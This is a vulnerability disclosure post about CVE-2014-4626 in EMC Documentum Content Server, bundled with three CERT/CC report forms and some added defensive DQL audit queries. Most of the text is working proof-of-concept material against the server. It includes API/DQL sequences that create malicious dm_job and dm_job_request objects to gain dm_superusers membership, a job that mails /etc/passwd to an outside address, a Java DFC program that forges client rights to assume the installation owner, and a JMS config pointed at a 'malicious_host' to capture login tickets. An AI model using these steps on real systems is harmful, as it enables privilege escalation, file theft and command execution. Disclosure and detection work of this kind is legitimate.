
Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects



Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed


In April 2014 I discovered a vulnerability in EMC Documentum Content Server
which allows an authenticated user to elevate privileges, hijack the Content
Server filesystem or execute arbitrary commands by creating malicious dm_job
objects (for a detailed description see VRF#HUFU6FNP.txt and VRF#HUFV0UZN.txt).

In October 2014 the vendor announced ESA-2014-105, which claimed that the
vulnerability had been remediated.

In November 2014 the fix was contested (there was a significant delay after
ESA-2014-105 because the vendor constantly fails to provide the status of
reported vulnerabilities) by providing a PoC similar to the one described in
VRF#HUGC34JH.txt; the description provided to CERT/CC (another CNA was chosen
because the vendor fails to communicate) was:
=================================8<================================
The problem is that a non-privileged user is able to create dm_job objects and
execute the corresponding docbase methods (some examples of "malicious" methods
are given in VRF#HUFU6FNP; also see VRF#HUFV0UZN). The word "create" here
means any sequence of commands that results in the existence of a dm_job
object. The PoC in VRF#HUFU6FNP describes an attack on the scheduler: the
scheduler does not schedule jobs unless they are owned by a superuser, so the
command sequence in that case was "create dm_job and update dm_job". EMC
thinks that they have fixed the vulnerability, but they just fixed the
sequence given in the PoC; another sequence is "create dm_sysobject, update
dm_sysobject & change dm_sysobject" (see VRF#HUGC34JH; it's an already known
attack). Also, I could provide a third PoC related to this report, but I do
not think that would be useful for EMC.
=================================>8================================


The current status of CVE-2014-4626 is obscure; the last public status can be
found in the CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340):
=================================8<================================
The new exploit is being tracked under PSRC-2494.
This is targeted for Q1 2015 (March patch).
=================================>8================================

Though the latest builds of EMC Documentum Content Server successfully pass
the PoCs described previously:
=================================8<================================
API> create,c,dm_job
...
08024be980006902
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
[DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error:
  "Must have system admin privileges or superuser privileges
   to change the owner_name to 'dmadmin'."



API> create,c,dm_sysobject
...
08024be980006904
API> set,c,l,owner_name
SET> dmadmin
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> save,c,l
...
OK
API> ?,c,change dm_sysobject object to dm_job
                      where r_object_id='08024be980006904'
[DM_QUERY_F_CHANGE_SAVE]fatal:  "CHANGE:  An unexpected save
      error has occurred for object 08024be980006904."

[DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error:
     "The current user (test) needs to have superuser or sysadmin
      privilege to create or save or destroy objects of type (dm_job)."
=================================>8================================


the vulnerability remains unfixed; below is another PoC (the job engine in
Documentum consists of two parts, the scheduler and the executor; the previous
attacks were designed to exploit the vulnerability in the scheduler, this one
demonstrates how to exploit the vulnerability in the job executor):
=================================8<================================
API> create,c,dm_job
...
08024be98000690e
API> set,c,l,object_name
SET> malicious job
...
OK
API> set,c,l,inactivate_after_failure
SET> 0
...
OK
API> set,c,l,max_iterations
SET> 0
...
OK
API> set,c,l,method_name
SET> dm_file_writer
...
OK
API> set,c,l,pass_standard_arguments
SET> 0
...
OK
API> set,c,l,run_interval
SET> 1
...
OK
API> set,c,l,run_mode
SET> 1
...
OK
API> set,c,l,run_now
SET> 1
...
OK
API> set,c,l,is_inactive
SET> 0
...
OK
API> set,c,l,world_permit
SET> 7
...
OK
API> append,c,l,method_arguments
SET> /tmp/test.txt
...
OK
API> append,c,l,method_arguments
SET> agentexec_has_vulnerability
...
OK
API> append,c,l,method_arguments
SET> CREATE
...
OK
API> save,c,l
...
OK
API> apply,c,,DO_METHOD,METHOD,S,agent_exec_method,
        ARGUMENTS,S,'
            -docbase_name DCTM_DEV.DCTM_DEV
            -docbase_owner dmadmin
            -job_id 08024be98000690e
            -log_directory /u01/documentum/cs/dba/log
            -docbase_id 150505
            -trace_level 10
       '
...
q0
API> next,c,q0
...
OK
API> dump,c,q0
...
USER ATTRIBUTES

 result                          : 0
 process_id                      : 91436
 launch_failed                   : F
 method_return_val               : 0
 os_system_error                 : No Error
 timed_out                       : F
 time_out_length                 : 60
 app_server_host_name            :
 app_server_port                 : 0
 app_server_uri                  :
 error_message                   :

SYSTEM ATTRIBUTES


APPLICATION ATTRIBUTES


INTERNAL ATTRIBUTES


API> Bye
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
=================================>8================================
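As an added defensive check (not part of the advisory above, and not vendor
code): the DQL below lists dm_job objects that a non-sysadmin account created
or last saved, or that bind a privileged docbase method to an owner other
than the creator, which are the two things the executor PoC above depends on.
It assumes the usual dm_user.user_privileges encoding (8 = sysadmin, 16 =
superuser) and treats only dm_file_writer and mail as "privileged methods";
both are assumptions to adjust per repository. The leading "--" lines are
annotations in the style of the transcripts above, not DQL syntax; strip them
before pasting the statement into idql.

```dql
-- Added audit query, not from the advisory. Assumption: sysadmin = 8 and
-- superuser = 16 in dm_user.user_privileges; method list is an assumption.
select r_object_id, object_name, owner_name, r_creator_name, r_modifier,
       r_modify_date, method_name, run_now, is_inactive, world_permit
from dm_job
where r_creator_name not in
        (select user_name from dm_user where user_privileges >= 8)
   or r_modifier not in
        (select user_name from dm_user where user_privileges >= 8)
   or (method_name in ('dm_file_writer', 'mail')
       and owner_name <> r_creator_name)
order by r_modify_date desc
```

Any row returned is a job that an unprivileged account touched or that was
re-owned after creation; compare r_creator_name against owner_name and look
at method_name and method_arguments of the hit before deciding whether it is
the scheduler or the executor variant of the attack. Because the executor path
runs the job through agent_exec_method without waiting for the scheduler,
is_inactive and run_now alone are not a reliable signal; the creator and
modifier columns are.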

__
Regards,
Andrey B. Panfilov

 Vulnerability Report Confirmation - [VRF#HUFU6FNP]

Your vulnerability report has been successfully received. You may save
or print this page for your own records. The Report Tracking ID assigned
to this report is VRF#HUFU6FNP. Details of your report are listed below.

If you have any questions or require additional information, please call
the CERT Hotline at +1 412-268-7090 or send email to cert@xxxxxxxx
<mailto:cert@xxxxxxxx?subject=VRF%20question%20VRF#HUFU6FNP>. Please
reference this Report Tracking ID: VRF#HUFU6FNP.



------------------------------------------------------------------------


   Vulnerability Report


Name	Andrey B. Panfilov
Organization	independent
Email Address	andrew@xxxxxxxxxxxx
Telephone Number
Vulnerability Description	EMC Documentum Content Server: any user is
able to elevate privileges, hijack Content Server filesystem, execute
any commands by creating malicious dm_job objects

Documentum Content Server has some docbase methods that are not supposed to
be used by regular users (such methods have special permissions that prevent
method invocation by regular users); examples of such methods:

1. mail method: emails a text file to a user

API> retrieve,c,dm_method where object_name='mail'
...
1001d92080000174
API> dump,c,l
...
USER ATTRIBUTES

object_name : mail
owner_permit : 7
group_name : docu
group_permit : 5
world_permit : 3
method_verb : ./dm_mailwrapper.sh

#!/bin/sh
# Mail wrapper: customize if you like
# Server will pass in subject, address and content_file
# Return of 0 means send succeeded, non-zero status results in the
# server generating an error message iff the method was launched
# synchronously.

delete_contents=0
if [ x"$1" = x"-delete_contents" ] ; then
    delete_contents=1
    shift
fi

subject=$1
address=$2
content_file=$3

/bin/mail -s "$subject" "$address" < $content_file
status=$?

if [ $delete_contents = 1 ] ; then
    # remove the temporary content file once it is sent
    \rm $content_file
fi

exit $status

Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle
1> execute do_method with method='mail',
2> arguments='test andrew@xxxxxxxxxxxx /etc/passwd'
3> go
[DM_METHOD_E_ASSUME_USER_UV]error: "Your method named (mail) failed to
execute
because the assume user process could not validation your user credentials.
Assume User Process returned (245=DM_CHKPASS_BAD_LOGIN)."

2. dm_file_writer: writes data to text files residing on the Content Server
filesystem

API> retrieve,c,dm_method where object_name='dm_file_writer'
...
1001d920800003a1
API> dump,c,l
...
USER ATTRIBUTES

object_name : dm_file_writer
owner_name : dmadmin
owner_permit : 7
group_name : docu
group_permit : 1
world_permit : 1
method_verb : dmbasic -eEntryPoint -f../install/admin/dm_file_writer.ebs


Sub EntryPoint(FilePath As String, DmData As String, WriteMode As String)
    On Error Goto ErrorCatch

    Select Case WriteMode
        Case "DELETE"
            Call chgEntry(FilePath, DmData, WriteMode)
        Case "CREATE"
            Open FilePath For Append As #2
            Print #2, DmData
            Close #2
        Case "UPDATE"
            Call chgEntry(FilePath, DmData, WriteMode)
        Case "APPEND"
            Call chgEntry(FilePath, DmData, WriteMode)
    End Select
    DmExit 0

ErrorCatch:
    Print Error$()
    DmExit 1
End Sub


Though neither method can be invoked by a non-privileged user, an attacker is
able to create a malicious dm_job object with the required parameters, after
which Content Server will execute the docbase method:

Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle
1> create dm_job object
2> set object_name = 'malicious job'
3> set inactivate_after_failure = FALSE
4> set max_iterations = 0
5> set method_name = 'mail'
6> set pass_standard_arguments = FALSE
7> set run_interval = 1
8> set run_mode = 1
9> set run_now = TRUE
10> set start_date = DATE('11/24/2013','mm/dd/yyyy')
11> set expiration_date = DATE('12/11/2016','mm/dd/yyyy')
12> set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy')
13> set is_inactive = FALSE
14> set world_permit=7
15> append method_arguments = 'test'
16> append method_arguments = 'andrew@xxxxxxxxxxxx'
17> append method_arguments = '/etc/passwd'
18> go
object_created
----------------
0801d920805675b0
(1 row affected)

Though Content Server checks the dm_job owner's privileges before executing
the job, it is possible to change the owner of the created dm_job object
either through the API or Webtop:

Connected to Documentum Server running Release 6.7.1230.0293 Linux.Oracle
Session id is s0
API> set,c,0801d920805675b0,owner_name
SET> dmadmin
...
OK
API> save,c,0801d920805675b0
...
OK
API>


~]$ idql repo -Uuser -Ppassword >/dev/null <<_EOF_
create dm_job object
set object_name = 'malicious file writer'
set inactivate_after_failure = FALSE
set max_iterations = 0
set method_name = 'dm_file_writer'
set pass_standard_arguments = FALSE
set run_interval = 1
set run_mode = 1
set run_now = TRUE
set start_date = DATE('11/24/2013','mm/dd/yyyy')
set expiration_date = DATE('12/11/2016','mm/dd/yyyy')
set a_next_invocation = DATE('11/24/2013','mm/dd/yyyy')
set is_inactive = FALSE
set world_permit=7
append method_arguments = '/tmp/test.txt'
append method_arguments = 'agentexec_has_vulnerability'
append method_arguments = 'CREATE'
go
_EOF_
~]$ iapi repo -Uuser -Ppassword >/dev/null <<_EOF_
retrieve,c,dm_job where object_name='malicious file writer'
set,c,l,owner_name
dmadmin
save,c,l
_EOF_
~]$ sleep 60
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
~]$
Can we provide your name to the vendor?	Yes
Do you want to be publicly acknowledged?	Yes
Vendor Contact Status	will not contact
Vendor Name	EMC
Vendor Contact Name
Vendor Contact Email
Vendor Contact Telephone Number
Vendor Tracking ID
Additional Vendor Information
Affected System Configurations	All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited?	Yes
Is there a public exploit?	Yes
Vulnerability Impact
Comments
Attached File
Date	2014-04-25T14:52:21
Report Tracking ID	VRF#HUFU6FNP
CERT Tracking IDs	VU#315340


------------------------------------------------------------------------
Carnegie Mellon University <http://www.cmu.edu/>

©2014 Carnegie Mellon University <http://www.cmu.edu/>


 Vulnerability Report Confirmation - [VRF#HUFV0UZN]



------------------------------------------------------------------------


   Vulnerability Report


Name	Andrey B. Panfilov
Organization	independent
Email Address	andrew@xxxxxxxxxxxx
Telephone Number
Vulnerability Description	EMC Documentum Content Server: any user is
able to elevate privileges by creating malicious dm_job_request objects

The vendor was notified about the vulnerability in November 2013; though the
vendor claims that the vulnerability has been fixed, it was not announced and
the fix is incomplete.

Documentum Content Server has two service tasks intended for renaming users
and groups: dm_UserRename and dm_GroupRename. Both are triggered when an
administrator renames a user or group in Documentum Administrator or when the
dm_LDAPSynchronization job completes its execution. Those jobs poll
uncompleted dm_job_request objects and perform the corresponding changes; the
problem is that any user is able to create a malicious dm_job_request object
and either rename his group to a system group (e.g. dm_superusers) or gain
unauthorized access to objects.

Example of exploitation:

-- creating test group
API> create,c,dm_group
...
1201d9208000dd00
API> set,c,l,group_name
SET> testjobrequest
...
OK
API> save,c,l
...
OK
-- creating test user
API> create,c,dm_user
...
1101d9208007890i
API> set,c,l,user_name
SET> testjobrequestusr
...
OK
API> set,c,l,user_login_name
SET> testjobrequestusr
...
OK
API> set,c,l,user_source
SET> inline password
...
OK
API> set,c,l,user_password
SET> test
...
OK
API> save,c,l
...
OK
API> ?,c,alter group testjobrequest add testjobrequestusr

-- creating test user session
API> connect,repo,testjobrequestusr,test
...
s1
-- creating request to rename testjobrequest group to dm_superusers
API> ?,s1,CREATE dm_job_request OBJECT set object_name='GroupRename',
set job_name='dm_GroupRename',
set method_name='dm_GroupRename',
set arguments_keys[0]='OldGroupName',
set arguments_values[0]='testjobrequest',
set arguments_keys[1]='NewGroupName',
set arguments_values[1]='dm_superusers',
set arguments_keys[2]='report_only',
set arguments_values[2]='F',
set arguments_keys[3]='unlock_locked_obj',
set arguments_values[3]='T'
object_created
----------------
0801d920805759f7
(1 row affected)

-- wait some time while dm_GroupRename job completes

-- now testjobrequestusr user is a member of dm_superusers group
API> ?,s1,select group_name from dm_group where any
i_all_users_names='testjobrequestusr'
group_name
--------------------------------
dm_superusers
(1 row affected)

Currently EMC is trying to implement the following approach to fix this
issue: they deny creation of dm_job_request objects with specific values of
job_name:

[DM_SESSION_I_SESSION_START]info: "Session 0101d920800f022e started for
user unprivileged_user."


Connected to Documentum Server running Release 6.7.1260.0322 Linux.Oracle
1> CREATE dm_job_request OBJECT set object_name='GroupRename',
2> set job_name='dm_GroupRename',
3> set method_name='dm_GroupRename',
4> set arguments_keys[0]='OldGroupName',
5> set arguments_values[0]='testjobrequest',
6> set arguments_keys[1]='NewGroupName',
7> set arguments_values[1]='dm_superusers',
8> set arguments_keys[2]='report_only',
9> set arguments_values[2]='F',
10> set arguments_keys[3]='unlock_locked_obj',
11> set arguments_values[3]='T'
12> go
[DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save
operation."

[DM_USER_E_NEED_SU_OR_SYS_PRIV]error: "The current user
(unprivileged_user) needs to have superuser or sysadmin privilege."


BUT:

1> CREATE dm_job_request OBJECT set object_name='GroupRename',
2> set job_name='dm_GroupRename1',
2> set method_name='dm_GroupRename',
4> set arguments_keys[0]='OldGroupName',
5> set arguments_values[0]='testjobrequest',
6> set arguments_keys[1]='NewGroupName',
7> set arguments_values[1]='dm_superusers',
8> set arguments_keys[2]='report_only',
9> set arguments_values[2]='F',
10> set arguments_keys[3]='unlock_locked_obj',
11> set arguments_values[3]='T'
12> go
object_created
----------------
0801d92080592bcd
(1 row affected)

So, according to VRF#HUFU6FNP, a non-privileged user is still able to
exploit this vulnerability by creating his own dm_job object and a malicious
dm_job_request. Also note that a user with sysadmin privilege
(VRF#HUDHKNW4) is able to exploit this vulnerability.
Can we provide your name to the vendor?	Yes
Do you want to be publicly acknowledged?	Yes
Vendor Contact Status	will not contact
Vendor Name	EMC
Vendor Contact Name
Vendor Contact Email
Vendor Contact Telephone Number
Vendor Tracking ID
Additional Vendor Information
Affected System Configurations	All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited?	Yes
Is there a public exploit?	No
Vulnerability Impact
Comments
Attached File
Date	2014-04-25T15:16:00
Report Tracking ID	VRF#HUFV0UZN
CERT Tracking IDs	VU#315340
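An added detection query for the dm_job_request issue described in
VRF#HUFV0UZN above (not part of the report, not vendor code). The report
shows that the vendor's check keyed on job_name alone and was bypassed by
'dm_GroupRename1' with method_name still 'dm_GroupRename', so the query below
matches on job_name, on method_name and on the target group named in
arguments_values, and keeps only requests created by accounts without
sysadmin or superuser privilege. The privilege threshold (8 = sysadmin, 16 =
superuser) and the list of sensitive groups are assumptions to adjust; the
"--" lines are annotations in the style of the transcripts above and must be
removed before running the statement in idql.

```dql
-- Added audit query, not from the report. Assumption: user_privileges >= 8
-- means sysadmin or superuser; group list is an assumption.
select r_object_id, object_name, job_name, method_name,
       r_creator_name, r_creation_date
from dm_job_request
where (job_name in ('dm_GroupRename', 'dm_UserRename')
       or method_name in ('dm_GroupRename', 'dm_UserRename')
       or any arguments_values in ('dm_superusers', 'dm_sysadmin'))
  and r_creator_name not in
        (select user_name from dm_user where user_privileges >= 8)
```

Requests from the rename jobs' legitimate callers (Documentum Administrator
or dm_LDAPSynchronization) are created by administrative accounts and fall
out of the result; any remaining row is a request that an ordinary user
queued for the rename jobs to pick up, and its arguments_keys/arguments_values
pairs show which group or user it targets.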


------------------------------------------------------------------------


 Vulnerability Report Confirmation - [VRF#HUGC34JH]



------------------------------------------------------------------------


   Vulnerability Report


Name	Andrey B. Panfilov
Organization	independent
Email Address	andrew@xxxxxxxxxxxx
Telephone Number
Vulnerability Description	EMC Documentum Content Server: any user is
able to elevate privileges by creating "protected" objects using "change
object" command.

In most cases non-privileged users are restricted from creating objects of
certain types; for example, if a user is able to create a dm_method object,
he is able to gain superuser privileges through execution of the
corresponding docbase method, so Content Server performs additional checks of
the user's privileges before creating objects of certain types:

Session id is s0
API> create,c,dm_method
...
1001ffd780095581
API> save,c,l
...
[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: "The current user (op1tp1)
needs to
have superuser or sysadmin privilege to save or destroy dm_method object."

API> ?,c,create dm_method object set object_name='test'
[DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save
operation."

[DM_METHOD_E_NEED_PRIV_FOR_CHANGE]error: "The current user (op1tp1)
needs to have
superuser or sysadmin privilege to save or destroy test dm_method object."


The problem is that a user is able to "create" an object of the required type
through execution of a "change object" statement if both the old and new
types share the same type tag.

1. dm_client_rights example:

package com.documentum.fc.client.security.impl;

import static java.lang.System.out;

import com.documentum.fc.client.DfClient;
import com.documentum.fc.client.DfQuery;
import com.documentum.fc.client.IDfACL;
import com.documentum.fc.client.IDfCollection;
import com.documentum.fc.client.IDfQuery;
import com.documentum.fc.client.IDfSession;
import com.documentum.fc.client.IDfSessionManager;
import com.documentum.fc.client.IDfSysObject;
import com.documentum.fc.client.privilege.internal.IClientRegistration;
import com.documentum.fc.client.privilege.internal.IClientRights;
import com.documentum.fc.client.security.internal.IPublicIdentity;
import com.documentum.fc.common.DfId;
import com.documentum.fc.common.DfList;
import com.documentum.fc.common.DfLoginInfo;
import com.documentum.fc.common.IDfList;
import com.documentum.fc.common.IDfLoginInfo;

// Declared in the DFC security package so that the DFC-internal helpers
// used below (PublicIdentity, IpAndRcHelper, RegAndItsAcl) resolve.
public class Test {

    public static void main(String argv[]) throws Exception {
        String docbase = argv[0];
        String username = argv[1];
        String password = argv[2];
        String domain = null;
        if (argv.length == 4) {
            domain = argv[3];
        }

        IDfSessionManager sessionManager = new DfClient().newSessionManager();
        IDfLoginInfo loginInfo = new DfLoginInfo(username, password);
        if (domain != null) {
            loginInfo.setDomain(domain);
        }
        sessionManager.setIdentity(docbase, loginInfo);
        out.println("Connecting to docbase '" + docbase + "' as '" + username
                + "'");
        IDfSession session = sessionManager.getSession(docbase);
        out.println("Connected");

        // Step 1: make sure this DFC instance has a dm_client_registration.
        IPublicIdentity publicIdentity = new PublicIdentity();
        out.println("Checking dm_client_registration for dfc: "
                + publicIdentity.getIdentity());
        IClientRegistration clientRegistration = IpAndRcHelper.getRegistration(
                publicIdentity, session);
        if (clientRegistration == null) {
            out.println("dm_client_registration for dfc '"
                    + publicIdentity.getIdentity()
                    + "' does not exist, creating...");
            String publicKeyIdentifier = IpAndRcHelper
                    .createNewCertificateObjectIfNeeded(publicIdentity, session);
            clientRegistration = (IClientRegistration) session
                    .newObject("dm_client_registration");
            RegAndItsAcl dbData = new RegAndItsAcl();
            dbData.reg = clientRegistration;
            dbData.acl = (IDfACL) session.newObject("dm_acl");
            dbData.acl = IpAndRcHelper
                    .fillAndSaveACLForClientRegistration(dbData.acl);
            IpAndRcHelper.fillAndSaveClientRegistration(dbData.reg,
                    publicIdentity, publicKeyIdentifier, dbData.acl);
        } else {
            out.println("dm_client_registration for dfc: "
                    + publicIdentity.getIdentity() + " exists");
        }

        // Step 2: dm_client_rights cannot be created directly by a regular
        // user, so save a plain dm_sysobject and CHANGE its type instead.
        out.println("Checking dm_client_rights for dfc: "
                + publicIdentity.getIdentity());
        IClientRights clientRights = (IClientRights) session
                .getObjectByQualification("dm_client_rights where client_id='"
                        + publicIdentity.getIdentity() + "'");
        if (clientRights != null) {
            out.println("dm_client_rights object for dfc: "
                    + publicIdentity.getIdentity() + " exists, exiting");
            return;
        }
        out.println("dm_client_rights object for dfc: "
                + publicIdentity.getIdentity() + " does not exist, creating");
        IDfSysObject tempObject = (IDfSysObject) session
                .newObject("dm_sysobject");
        tempObject.save();
        IDfQuery query = new DfQuery("CHANGE dm_sysobject OBJECT "
                + "TO dm_client_rights SET object_name='"
                + clientRegistration.getObjectName() + "', "
                + "SET client_id='" + publicIdentity.getIdentity() + "', "
                + "SET public_key_identifier='"
                + clientRegistration.getPublicKeyIdentifier() + "', "
                + "SET host_name='" + clientRegistration.getHostName()
                + "', SET allow_all_roles=TRUE, "
                + "SET allow_all_priv_modules=TRUE, "
                + "SET principal_auth_priv=TRUE, "
                + "SET server_trust_priv=TRUE WHERE r_object_id='"
                + tempObject.getObjectId().getId() + "'");
        IDfCollection collection = query.execute(session, IDfQuery.EXEC_QUERY);
        boolean created = false;
        if (collection != null && collection.next()) {
            out.println("Object changed: "
                    + collection.getInt("objects_changed"));
            if (collection.getInt("objects_changed") > 0) {
                created = true;
            }
        }
        if (collection != null) {
            collection.close();
        }
        if (!created) {
            out.println("Unable to create dm_client_rights object");
            return;
        }

        // Step 3: the client now has trusted-login rights, so obtain a login
        // ticket for the installation owner and assume that identity.
        String installationOwner = session.getServerConfig().getString(
                "r_install_owner");
        out.println("Reconnecting as " + installationOwner + " ...");
        IDfList arguments = new DfList(new String[] {"CONNECT_POOLING",
                "ASSUME_USER", "CHECK_ONLY", "AUTHENTICATE_ONLY", "OS_LOGON_NAME",
                "LOGON_NAME", "TRUSTED_LOGIN_ALLOWED", });
        IDfList types = new DfList(new String[] {"B", "B", "B", "B", "S", "S",
                "B", });
        IDfList values = new DfList(new String[] {"F", "T", "F", "F",
                installationOwner, installationOwner, "T", });
        collection = session.apply(DfId.DF_NULLID_STR, "AUTHENTICATE_USER",
                arguments, types, values);
        if (collection != null && collection.next()) {
            if (collection.getInt("RETURN_VALUE") != 1) {
                out.println("Unable to authenticate as " + installationOwner);
                return;
            }
            session.assume(new DfLoginInfo(installationOwner, session
                    .getLoginTicketForUser(installationOwner)));
            out.println("Checking whether we are a superuser...");
            IDfSysObject serverConfig = (IDfSysObject) session
                    .getServerConfig();
            out.println("Permissions for dm_server_config: "
                    + serverConfig.getPermit());
        }
        if (collection != null) {
            collection.close();
        }
    }
}

2. dm_job_request example (see also VRF#HUFV0UZN):

1> create dm_job_request OBJECT set object_name='GroupRename',
2> set job_name='dm_GroupRename1',
3> set method_name='dm_GroupRename',
4> set arguments_keys[0]='OldGroupName',
5> set arguments_values[0]='testjobrequest',
6> set arguments_keys[1]='NewGroupName',
7> set arguments_values[1]='dm_superusers',
8> set arguments_keys[2]='report_only',
9> set arguments_values[2]='F',
10> set arguments_keys[3]='unlock_locked_obj',
11> set arguments_values[3]='T'
12> go
object_created
----------------
08022428800058f6
(1 row affected)
1> update dm_job_request objects set job_name='dm_GroupRename'
2> where job_name='dm_GroupRename1'
3> go
[DM_QUERY_F_UP_SAVE]fatal: "UPDATE: An error has occurred during a save
operation."

[DM_USER_E_NEED_SU_OR_SYS_PRIV]error:
"The current user (dm_bof_registry) needs to have superuser or sysadmin
privilege."

1> create dm_sysobject object
2> set object_name='dm_GroupRename2'
3> go
object_created
----------------
08022428800058fd
(1 row affected)

1> change dm_sysobject object to dm_job_request
2> set object_name='GroupRename',
3> set job_name='dm_GroupRename',
4> set method_name='dm_GroupRename',
5> set arguments_keys[0]='OldGroupName',
6> set arguments_values[0]='testjobrequest',
7> set arguments_keys[1]='NewGroupName',
8> set arguments_values[1]='dm_superusers',
9> set arguments_keys[2]='report_only',
10> set arguments_values[2]='F',
11> set arguments_keys[3]='unlock_locked_obj',
12> set arguments_values[3]='T'
13> where object_name='dm_GroupRename2'
14> go
objects_changed
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE
statement."

3. dm_jms_config example (dm_jms_config could be used to "sniff"
superuser login tickets):

Behavior before Documentum Content Server v6.7SP1P26:

create dm_jms_config object
set object_name='malicious JMS config',
set config_type=2,
append server_config_id=(select r_object_id from dm_server_config)
append servlet_name='do_bpm',
append base_uri='http://malicious_host:port/....',
append supported_protocol='http',
append projection_enable=TRUE,
append projection_proximity_value=1,
append projection_targets='malicious_host',
append projection_ports=0

Documentum Content Server v6.7SP1P26 behavior:

1> create dm_jms_config object
2> set object_name='test jms config'
3> go
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error:
"The current user (dm_bof_registry) needs to have superuser or sysadmin
privilege."

1> create dm_sysobject object
2> set object_name='test jms config'
3> go
object_created
----------------
08022428800056fa
(1 row affected)
1> select r_object_id from dm_server_config
2> go
r_object_id
----------------
3d02242880000102
(1 row affected)

1> select r_object_id from dm_jms_config
2> go
r_object_id
----------------
(0 rows affected)
1> change dm_sysobject object to dm_sysprocess_config
2> where object_name='test jms config'
3> go
objects_changed
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE
statement."

1> change dm_sysprocess_config object to dm_jms_config
2> append server_config_id='3d02242880000102'
3> where object_name='test jms config'
4> go
objects_changed
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE
statement."

4. dmc_module example (see also VRF#HUDHKNW4):

1> create dmc_module object
2> set object_name='test dmc module'
3> go
[DM_USER_E_NEED_SU_OR_SYS_PRIV]error:
"The current user (dm_bof_registry) needs to have superuser or sysadmin
privilege."

1> create dm_folder object
2> set object_name='test dmc module'
3> go
object_created
----------------
0b0224288000578c
(1 row affected)
1> change dm_folder object to dmc_module
2> where object_name='test dmc module'
3> go
objects_changed
---------------
1
(1 row affected)
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your CHANGE
statement."
Can we provide your name to the vendor?	Yes
Do you want to be publicly acknowledged?	Yes
Vendor Contact Status	will not contact
Vendor Name	EMC
Vendor Contact Name
Vendor Contact Email
Vendor Contact Telephone Number
Vendor Tracking ID
Additional Vendor Information
Affected System Configurations	All versions of EMC Documentum Content Server
How was this vulnerability found?
Is the vulnerability being exploited?	Yes
Is there a public exploit?	Yes
Vulnerability Impact
Comments
Attached File
Date	2014-04-25T23:13:39
Report Tracking ID	VRF#HUGC34JH
CERT Tracking IDs	VU#315340
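An added inventory query for the "change object" issue described in
VRF#HUGC34JH above (not part of the report, not vendor code). It generalises
the four examples: because a CHANGE ... OBJECT statement keeps the original
r_creator_name while replacing r_object_type, every object of a protected
type whose creator lacks sysadmin or superuser privilege is a candidate for
having been created through this path. The type list covers the types the
report names (plus dm_method and dm_job, which the same trick reaches); the
privilege threshold (8 = sysadmin, 16 = superuser) is an assumption. The "--"
lines are annotations in the style of the transcripts above and must be
removed before running the statement in idql.

```dql
-- Added inventory query, not from the report. Assumption: user_privileges
-- >= 8 means sysadmin or superuser; the type list is a starting point.
select r_object_id, r_object_type, object_name, r_creator_name, r_modifier,
       r_creation_date, r_modify_date
from dm_sysobject
where r_object_type in ('dm_method', 'dm_job', 'dm_job_request',
                        'dm_client_rights', 'dm_jms_config', 'dmc_module')
  and r_creator_name not in
        (select user_name from dm_user where user_privileges >= 8)
order by r_object_type, r_creation_date desc
```

dm_client_registration is deliberately left out: the DFC example above
creates it as an ordinary user through DFC's own helpers, so that type
produces benign hits. For the remaining types a normally installed repository
has every object created by the installation owner or another administrative
account, so each row returned is worth a look at its current attributes
(server_config_id on a dm_jms_config, method_verb on a dm_method,
method_name and owner_name on a dm_job) before it is destroyed.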


------------------------------------------------------------------------